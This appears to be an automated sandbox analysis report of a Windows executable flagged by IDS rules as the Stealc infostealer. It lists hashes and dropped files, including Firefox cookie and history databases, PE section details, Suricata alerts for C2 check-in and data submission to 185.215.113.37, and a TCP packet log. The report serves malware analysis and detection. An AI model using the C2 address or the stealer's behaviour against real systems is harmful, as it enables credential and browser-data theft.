SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.948774553729502
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'828'352 bytes
MD5:	780720dd7e3b1cec8e5da391c946b80f
SHA1:	01d37c7414ac9db385b6f44db0f5a6feb1cce2d1
SHA256:	145d77a1362f477b2084f18bd09da64330fda9cf41a7b1c405466b3a9950a3df
SHA512:	47a58b4be5af79e2d21fe8ad913209f4f62c5ca7aff29fb145ec7e739e61ac83210b8bab05e521d6fc8a16a40513219102942fdacd4f74ea75a39d3948df3bab
SSDEEP:	49152:n534YfObhC94ZQruSwKnBpBn+Bk4GE77RJ:5oaObY9MQrrPB+n37RJ
TLSH:	4D85334D0B91B819C88C3D3941B3276CE369CBF56ADAD46505078C3EDEA79E72FE050A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xa94000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F2CBD1DC07Ah
pinsrw mm3, word ptr [ebx], 00h
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F2CBD1DE075h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], cl
or al, byte ptr [eax]
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dl, ch
pop es
add ch, ch
lea edi, dword ptr [edi+00h]
enter 276Ah, 3Ch
sal ch, FFFFFFA5h
cmp ecx, dword ptr [ebx]
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [00000000h], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	cc1f70f704e3fd2fbb0a348189bb43d4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x29c000	0x200	a3d5304fe569593750f0db27b16a1186	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jgktddvv	0x4fa000	0x199000	0x198200	e225faf8bf96a619563380245314a838	False	0.9950032302833078	data	7.954389095355929	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rojuqcjw	0x693000	0x1000	0x600	e981aff19a97d8da2934eddeb78cc733	False	0.5559895833333334	data	4.831590468908497	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x694000	0x3000	0x2200	3496b8048f937b73ced79232825b881e	False	0.07605698529411764	DOS executable (COM)	0.7988707892034118	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-28T07:32:02.663504+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-28T07:32:02.890638+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-28T07:32:02.896715+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.4	49730	TCP
2024-09-28T07:32:03.117970+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-28T07:32:03.124752+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.4	49730	TCP
2024-09-28T07:32:04.209777+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-28T07:32:04.683892+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-28T07:32:10.159562+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-28T07:32:11.210096+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-28T07:32:11.832016+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-28T07:32:12.358400+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-28T07:32:14.040618+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-28T07:32:14.425198+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2024 07:32:01.707148075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:01.712279081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:01.712407112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:01.712605953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:01.717376947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:02.419660091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:02.419725895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:02.422169924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:02.427054882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:02.663398981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:02.663503885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:02.664743900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:02.669575930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:02.890487909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:02.890542030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:02.890638113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:02.890639067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:02.891874075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:02.896714926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.117698908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.117753983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.117789984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.117837906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.117871046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.117918968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.117949963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.117969990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:03.117983103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.118021011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.118088007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:03.118088007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:03.118088007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:03.118088007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:03.119888067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:03.124752045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.345062017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.345175028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:03.468221903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:03.468278885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:03.468278885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:03.473222017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.473234892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.473244905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.473253012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.473412991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.473422050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:03.473429918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.209650040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.209777117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.461432934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.466428995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.683818102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.683840990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.683851004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.683862925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.683873892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.683883905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.683892012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.683943987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.683943987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.684432983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.684494972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.684596062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.684634924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.684638977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.684647083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.684676886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.684710979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.684999943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.685045958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.685058117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.685070038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.685091972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.685103893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.685133934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.685148001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.813431025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.813447952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.813465118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.813474894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.813484907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.813496113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.813510895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.813555956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.813563108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.813602924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.813950062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.814035892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.814095020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.814129114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.814160109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.814169884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.814171076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.814203024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.814218998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.814481974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.814528942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.814534903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.814539909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.814568996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.814584970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.814666033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.814677000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.814687014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.814718962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.814740896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.815342903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.815399885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.815402031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.815412045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.815444946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.815459967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.815535069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.815546036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.815555096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.815599918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.815630913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.816282988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.816318989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.816351891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.816366911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.943005085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.943043947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.943074942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.943095922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.943211079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.943238974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.943249941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.943260908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.943260908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.943276882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.943305016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.943305016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.943329096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.943358898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.943397045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.943569899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.943619013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.943619967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.943634987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.943662882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.943679094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.943710089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.943722010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.943752050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.943768024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.943965912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.944011927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.944017887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.944024086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.944066048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.944081068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.944144011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.944154978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.944164991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.944195032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.944216967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.944488049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.944535017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.944555044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.944566965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.944603920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.944627047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.944667101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.944823980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.944871902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.944871902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.944885015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.944920063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.944937944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.945070028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.945080996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.945091009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.945101023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.945121050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.945144892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.945190907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.945226908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.945231915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.945269108 CEST	49730	80	192.168.2.4	185.215.113.37
